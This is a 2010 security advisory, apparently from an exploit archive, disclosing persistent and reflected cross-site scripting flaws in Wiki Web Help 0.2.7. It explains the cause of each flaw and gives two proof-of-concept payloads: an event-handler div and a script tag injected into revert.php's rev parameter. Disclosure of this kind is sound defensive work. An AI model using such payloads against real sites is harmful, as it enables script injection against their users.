Wiki Web Help 0.2.7 cross site scripting

2010.07.02

Credit: John Leitch

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

------------------------------------------------------------------------
Software................Wiki Web Help 0.2.7
Vulnerability...........Persistent/Reflected XSS
Download................http://sourceforge.net/projects/wwh/
Release Date............7/1/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to
execute arbitrary JavaScript.
--Exploit--
Persistent: Event attributes are not removed from user submitted HTML elements.
Reflected: The rev query string field of revert.php does not HTML
encode user submitted data.
--PoC--
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>
Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wiki Web Help 0.2.7 cross site scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.